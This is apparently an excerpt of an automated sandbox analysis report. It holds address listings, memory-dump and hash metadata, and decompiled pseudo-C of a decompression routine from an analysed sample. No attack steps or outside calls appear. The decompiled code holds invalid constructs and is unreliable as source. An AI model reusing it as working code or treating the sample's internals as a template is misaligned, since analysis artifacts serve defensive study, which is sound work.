                                                          0x004061e5
                                                          0x004061e9
                                                          0x004061ec
                                                          0x004061f2
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f7
                                                          0x004061fa
                                                          0x004061fa
                                                          0x004061fa
                                                          0x00406200
                                                          0x00000000
                                                          0x00000000
                                                          0x00406202
                                                          0x00406205
                                                          0x00406208
                                                          0x0040620b
                                                          0x0040620e
                                                          0x00406211
                                                          0x00406214
                                                          0x00406217
                                                          0x0040621a
                                                          0x0040621d
                                                          0x00406220
                                                          0x00406238
                                                          0x0040623b
                                                          0x0040623e
                                                          0x00406241
                                                          0x00406241
                                                          0x00406244
                                                          0x00406248
                                                          0x0040624a
                                                          0x00406222
                                                          0x00406222
                                                          0x0040622a
                                                          0x0040622f
                                                          0x00406231
                                                          0x00406233
                                                          0x00406233
                                                          0x0040624d
                                                          0x00406254
                                                          0x00406257
                                                          0x00000000
                                                          0x00406259
                                                          0x00000000
                                                          0x00406259
                                                          0x00406257
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406299
                                                          0x00406299
                                                          0x0040629d
                                                          0x004068a5
                                                          0x00000000
                                                          0x004068a5
                                                          0x004062a3
                                                          0x004062a6
                                                          0x004062a9
                                                          0x004062ad
                                                          0x004062b0
                                                          0x004062b6
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062bb
                                                          0x004062be
                                                          0x004062be
                                                          0x004062c4
                                                          0x00406262
                                                          0x00406262
                                                          0x00406265
                                                          0x00000000
                                                          0x00406265
                                                          0x004062c6
                                                          0x004062c6
                                                          0x004062c9
                                                          0x004062cc
                                                          0x004062cf
                                                          0x004062d2
                                                          0x004062d5
                                                          0x004062d8
                                                          0x004062db
                                                          0x004062de
                                                          0x004062e1
                                                          0x004062e4
                                                          0x004062fc
                                                          0x004062ff
                                                          0x00406302
                                                          0x00406305
                                                          0x00406305
                                                          0x00406308
                                                          0x0040630c
                                                          0x0040630e
                                                          0x004062e6
                                                          0x004062e6
                                                          0x004062ee
                                                          0x004062f3
                                                          0x004062f5
                                                          0x004062f7
                                                          0x004062f7
                                                          0x00406311
                                                          0x00406318
                                                          0x0040631b
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x004065aa
                                                          0x004065aa
                                                          0x004065ae
                                                          0x004068d5
                                                          0x00000000
                                                          0x004068d5
                                                          0x004065b4
                                                          0x004065b7
                                                          0x004065ba
                                                          0x004065be
                                                          0x004065c1
                                                          0x004065c7
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004066b9
                                                          0x004066bd
                                                          0x004066df
                                                          0x004066e2
                                                          0x004066ec
                                                          0x00000000
                                                          0x004066ec
                                                          0x004066bf
                                                          0x004066c2
                                                          0x004066c6
                                                          0x004066c9
                                                          0x004066c9
                                                          0x004066cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406776
                                                          0x0040677a
                                                          0x00406798
                                                          0x00406798
                                                          0x00406798
                                                          0x0040679f
                                                          0x004067a6
                                                          0x004067ad
                                                          0x004067ad
                                                          0x00000000
                                                          0x004067ad
                                                          0x0040677c
                                                          0x0040677f
                                                          0x00406782
                                                          0x00406785
                                                          0x0040678c
                                                          0x004066d0
                                                          0x004066d0
                                                          0x004066d3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406867
                                                          0x0040686a
                                                          0x00000000
                                                          0x00000000
                                                          0x004064a1
                                                          0x004064a3
                                                          0x004064aa
                                                          0x004064ab
                                                          0x004064ad
                                                          0x004064b0
                                                          0x00000000
                                                          0x00000000
                                                          0x004064b8
                                                          0x004064bb
                                                          0x004064be
                                                          0x004064c0
                                                          0x004064c2
                                                          0x004064c2
                                                          0x004064c3
                                                          0x004064c6
                                                          0x004064cd
                                                          0x004064d0
                                                          0x004064de
                                                          0x00000000
                                                          0x00000000
                                                          0x004067b4
                                                          0x004067b4
                                                          0x004067b7
                                                          0x004067be
                                                          0x00000000
                                                          0x00000000
                                                          0x004067c3
                                                          0x004067c3
                                                          0x004067c7
                                                          0x004068ff
                                                          0x00000000
                                                          0x004068ff
                                                          0x004067cd
                                                          0x004067d0
                                                          0x004067d3
                                                          0x004067d7
                                                          0x004067da
                                                          0x004067e0
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e5
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067eb
                                                          0x004067eb
                                                          0x004067ef
                                                          0x0040684f
                                                          0x00406852
                                                          0x00406857
                                                          0x00406858
                                                          0x0040685a
                                                          0x0040685c
                                                          0x0040685f
                                                          0x00000000
                                                          0x0040685f
                                                          0x004067f1
                                                          0x004067f7
                                                          0x004067fa
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406806
                                                          0x00406809
                                                          0x0040680c
                                                          0x0040680f
                                                          0x00406812
                                                          0x0040682b
                                                          0x0040682e
                                                          0x00406831
                                                          0x00406834
                                                          0x00406838
                                                          0x0040683a
                                                          0x0040683a
                                                          0x0040683b
                                                          0x0040683e
                                                          0x00406814
                                                          0x00406814
                                                          0x0040681c
                                                          0x00406821
                                                          0x00406823
                                                          0x00406826
                                                          0x00406826
                                                          0x00406841
                                                          0x00406848
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x004064e6
                                                          0x004064e9
                                                          0x0040651f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x00406652
                                                          0x00406652
                                                          0x00406655
                                                          0x00406657
                                                          0x004068e1
                                                          0x00000000
                                                          0x004068e1
                                                          0x0040665d
                                                          0x00406660
                                                          0x00000000
                                                          0x00000000
                                                          0x00406666
                                                          0x0040666a
                                                          0x0040666d
                                                          0x0040666d
                                                          0x0040666d
                                                          0x00000000
                                                          0x0040666d
                                                          0x004064eb
                                                          0x004064ed
                                                          0x004064ef
                                                          0x004064f1
                                                          0x004064f4
                                                          0x004064f5
                                                          0x004064f7
                                                          0x004064f9
                                                          0x004064fc
                                                          0x004064ff
                                                          0x00406515
                                                          0x0040651a
                                                          0x00406552
                                                          0x00406552
                                                          0x00406556
                                                          0x00406582
                                                          0x00406584
                                                          0x0040658b
                                                          0x0040658e
                                                          0x00406591

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 37a6e0cc647a8bcf712af8254647d354cdd6ee6681e937b8812b349d59c70459
                                                          • Instruction ID: fc637cc57031d6fa7fc43ec0fa9912bbb078f827e800a3857ce4fc75fdb5e0f4
                                                          • Opcode Fuzzy Hash: 37a6e0cc647a8bcf712af8254647d354cdd6ee6681e937b8812b349d59c70459
                                                          • Instruction Fuzzy Hash: 00815771D00229CFDF24CFA8C844BADBBB1FB44305F25816AD856BB281D7789A96DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E00406322() {
                                                          				signed int _t539;
                                                          				unsigned short _t540;
                                                          				signed int _t541;
                                                          				void _t542;
                                                          				signed int _t543;
                                                          				signed int _t544;
                                                          				signed int _t573;
                                                          				signed int _t576;
                                                          				signed int _t597;
                                                          				signed int* _t614;
                                                          				void* _t621;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t621 - 0x40) != 1) {
                                                          						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                          						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                          						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                          						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                          						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                          						_t539 =  *(_t621 - 4) + 0x664;
                                                          						 *(_t621 - 0x58) = _t539;
                                                          						goto L68;
                                                          					} else {
                                                          						 *(__ebp - 0x84) = 8;
                                                          						while(1) {
                                                          							L132:
                                                          							 *(_t621 - 0x54) = _t614;
                                                          							while(1) {
                                                          								L133:
                                                          								_t540 =  *_t614;
                                                          								_t597 = _t540 & 0x0000ffff;
                                                          								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                          								if( *(_t621 - 0xc) >= _t573) {
                                                          									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                          									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                          									 *(_t621 - 0x40) = 1;
                                                          									_t541 = _t540 - (_t540 >> 5);
                                                          									 *_t614 = _t541;
                                                          								} else {
                                                          									 *(_t621 - 0x10) = _t573;
                                                          									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                          									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                          								}
                                                          								if( *(_t621 - 0x10) >= 0x1000000) {
                                                          									goto L139;
                                                          								}
                                                          								L137:
                                                          								if( *(_t621 - 0x6c) == 0) {
                                                          									 *(_t621 - 0x88) = 5;
                                                          									L170:
                                                          									_t576 = 0x22;
                                                          									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                          									_t544 = 0;
                                                          									L172:
                                                          									return _t544;
                                                          								}
                                                          								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                          								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                          								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                          								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                          								L139:
                                                          								_t542 =  *(_t621 - 0x84);
                                                          								while(1) {
                                                          									 *(_t621 - 0x88) = _t542;
                                                          									while(1) {
                                                          										L1:
                                                          										_t543 =  *(_t621 - 0x88);
                                                          										if(_t543 > 0x1c) {
                                                          											break;
                                                          										}
                                                          										switch( *((intOrPtr*)(_t543 * 4 +  &M00406926))) {
                                                          											case 0:
                                                          												if( *(_t621 - 0x6c) == 0) {
                                                          													goto L170;
                                                          												}
                                                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                          												_t543 =  *( *(_t621 - 0x70));
                                                          												if(_t543 > 0xe1) {
                                                          													goto L171;
                                                          												}
                                                          												_t547 = _t543 & 0x000000ff;
                                                          												_push(0x2d);
                                                          												asm("cdq");
                                                          												_pop(_t578);
                                                          												_push(9);
                                                          												_pop(_t579);
                                                          												_t617 = _t547 / _t578;
                                                          												_t549 = _t547 % _t578 & 0x000000ff;
                                                          												asm("cdq");
                                                          												_t612 = _t549 % _t579 & 0x000000ff;
                                                          												 *(_t621 - 0x3c) = _t612;
                                                          												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                          												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                          												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                          												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                          													L10:
                                                          													if(_t620 == 0) {
                                                          														L12:
                                                          														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                          														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                          														goto L15;
                                                          													} else {
                                                          														goto L11;
                                                          													}
                                                          													do {
                                                          														L11:
                                                          														_t620 = _t620 - 1;
                                                          														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                          													} while (_t620 != 0);
                                                          													goto L12;
                                                          												}
                                                          												if( *(_t621 - 4) != 0) {
                                                          													GlobalFree( *(_t621 - 4));
                                                          												}
                                                          												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                          												 *(_t621 - 4) = _t543;
                                                          												if(_t543 == 0) {
                                                          													goto L171;
                                                          												} else {
                                                          													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                          													goto L10;
                                                          												}
                                                          											case 1:
                                                          												L13:
                                                          												__eflags =  *(_t621 - 0x6c);
                                                          												if( *(_t621 - 0x6c) == 0) {
                                                          													 *(_t621 - 0x88) = 1;
                                                          													goto L170;
                                                          												}
                                                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                          												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                          												_t45 = _t621 - 0x48;
                                                          												 *_t45 =  *(_t621 - 0x48) + 1;
                                                          												__eflags =  *_t45;
                                                          												L15:
                                                          												if( *(_t621 - 0x48) < 4) {
                                                          													goto L13;
                                                          												}
                                                          												_t555 =  *(_t621 - 0x40);
                                                          												if(_t555 ==  *(_t621 - 0x74)) {
                                                          													L20:
                                                          													 *(_t621 - 0x48) = 5;
                                                          													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                          													goto L23;
                                                          												}
                                                          												 *(_t621 - 0x74) = _t555;
                                                          												if( *(_t621 - 8) != 0) {
                                                          													GlobalFree( *(_t621 - 8));
                                                          												}
                                                          												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                          												 *(_t621 - 8) = _t543;
                                                          												if(_t543 == 0) {
                                                          													goto L171;
                                                          												} else {
                                                          													goto L20;
                                                          												}
                                                          											case 2:
                                                          												L24:
                                                          												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                          												 *(_t621 - 0x84) = 6;
                                                          												 *(_t621 - 0x4c) = _t562;
                                                          												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                          												goto L132;
                                                          											case 3:
                                                          												L21:
                                                          												__eflags =  *(_t621 - 0x6c);
                                                          												if( *(_t621 - 0x6c) == 0) {
                                                          													 *(_t621 - 0x88) = 3;
                                                          													goto L170;
                                                          												}
                                                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                          												_t67 = _t621 - 0x70;
                                                          												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                          												__eflags =  *_t67;
                                                          												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                          												L23:
                                                          												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                          												if( *(_t621 - 0x48) != 0) {
                                                          													goto L21;
                                                          												}
                                                          												goto L24;
                                                          											case 4:
                                                          												L133:
                                                          												_t540 =  *_t614;
                                                          												_t597 = _t540 & 0x0000ffff;
                                                          												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                          												if( *(_t621 - 0xc) >= _t573) {
                                                          													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                          													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                          													 *(_t621 - 0x40) = 1;
                                                          													_t541 = _t540 - (_t540 >> 5);
                                                          													 *_t614 = _t541;
                                                          												} else {
                                                          													 *(_t621 - 0x10) = _t573;
                                                          													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                          													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                          												}
                                                          												if( *(_t621 - 0x10) >= 0x1000000) {
                                                          													goto L139;
                                                          												}
                                                          											case 5:
                                                          												goto L137;
                                                          											case 6:
                                                          												__edx = 0;
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 4);
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x34) = 1;
                                                          													 *(__ebp - 0x84) = 7;
                                                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          													L132:
                                                          													 *(_t621 - 0x54) = _t614;
                                                          													goto L133;
                                                          												}
                                                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          												__esi =  *(__ebp - 0x60);
                                                          												__cl = 8;
                                                          												__cl = 8 -  *(__ebp - 0x3c);
                                                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          												__ecx =  *(__ebp - 0x3c);
                                                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          												__ecx =  *(__ebp - 4);
                                                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          												__eflags =  *(__ebp - 0x38) - 4;
                                                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          												if( *(__ebp - 0x38) >= 4) {
                                                          													__eflags =  *(__ebp - 0x38) - 0xa;
                                                          													if( *(__ebp - 0x38) >= 0xa) {
                                                          														_t98 = __ebp - 0x38;
                                                          														 *_t98 =  *(__ebp - 0x38) - 6;
                                                          														__eflags =  *_t98;
                                                          													} else {
                                                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          													}
                                                          												} else {
                                                          													 *(__ebp - 0x38) = 0;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x34) - __edx;
                                                          												if( *(__ebp - 0x34) == __edx) {
                                                          													__ebx = 0;
                                                          													__ebx = 1;
                                                          													goto L61;
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x14);
                                                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          													__eflags = __eax -  *(__ebp - 0x74);
                                                          													if(__eax >=  *(__ebp - 0x74)) {
                                                          														__eax = __eax +  *(__ebp - 0x74);
                                                          														__eflags = __eax;
                                                          													}
                                                          													__ecx =  *(__ebp - 8);
                                                          													__ebx = 0;
                                                          													__ebx = 1;
                                                          													__al =  *((intOrPtr*)(__eax + __ecx));
                                                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          													goto L41;
                                                          												}
                                                          											case 7:
                                                          												goto L0;
                                                          											case 8:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 4);
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x84) = 0xa;
                                                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x38);
                                                          													__ecx =  *(__ebp - 4);
                                                          													__eax =  *(__ebp - 0x38) + 0xf;
                                                          													 *(__ebp - 0x84) = 9;
                                                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          												}
                                                          												while(1) {
                                                          													L132:
                                                          													 *(_t621 - 0x54) = _t614;
                                                          													goto L133;
                                                          												}
                                                          											case 9:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													goto L89;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x60);
                                                          												if( *(__ebp - 0x60) == 0) {
                                                          													goto L171;
                                                          												}
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                          												__eflags = _t258;
                                                          												0 | _t258 = _t258 + _t258 + 9;
                                                          												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                          												goto L75;
                                                          											case 0xa:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 4);
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x84) = 0xb;
                                                          													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          													while(1) {
                                                          														L132:
                                                          														 *(_t621 - 0x54) = _t614;
                                                          														goto L133;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x28);
                                                          												goto L88;
                                                          											case 0xb:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__ecx =  *(__ebp - 0x24);
                                                          													__eax =  *(__ebp - 0x20);
                                                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x24);
                                                          												}
                                                          												__ecx =  *(__ebp - 0x28);
                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          												L88:
                                                          												__ecx =  *(__ebp - 0x2c);
                                                          												 *(__ebp - 0x2c) = __eax;
                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          												L89:
                                                          												__eax =  *(__ebp - 4);
                                                          												 *(__ebp - 0x80) = 0x15;
                                                          												__eax =  *(__ebp - 4) + 0xa68;
                                                          												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          												goto L68;
                                                          											case 0xc:
                                                          												L99:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xc;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t334 = __ebp - 0x70;
                                                          												 *_t334 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t334;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												goto L101;
                                                          											case 0xd:
                                                          												L37:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xd;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t122 = __ebp - 0x70;
                                                          												 *_t122 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t122;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L39:
                                                          												__eax =  *(__ebp - 0x40);
                                                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          													goto L48;
                                                          												}
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													goto L54;
                                                          												}
                                                          												L41:
                                                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          												 *(__ebp - 0x48) = __eax;
                                                          												__eax = __eax + 1;
                                                          												__eax = __eax << 8;
                                                          												__eax = __eax + __ebx;
                                                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edx = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													 *(__ebp - 0x40) = 1;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													__ebx = __ebx + __ebx + 1;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edx;
                                                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L39;
                                                          												} else {
                                                          													goto L37;
                                                          												}
                                                          											case 0xe:
                                                          												L46:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xe;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t156 = __ebp - 0x70;
                                                          												 *_t156 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t156;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												while(1) {
                                                          													L48:
                                                          													__eflags = __ebx - 0x100;
                                                          													if(__ebx >= 0x100) {
                                                          														break;
                                                          													}
                                                          													__eax =  *(__ebp - 0x58);
                                                          													__edx = __ebx + __ebx;
                                                          													__ecx =  *(__ebp - 0x10);
                                                          													__esi = __edx + __eax;
                                                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          													__ax =  *__esi;
                                                          													 *(__ebp - 0x54) = __esi;
                                                          													__edi = __ax & 0x0000ffff;
                                                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          													__eflags =  *(__ebp - 0xc) - __ecx;
                                                          													if( *(__ebp - 0xc) >= __ecx) {
                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          														__cx = __ax;
                                                          														_t170 = __edx + 1; // 0x1
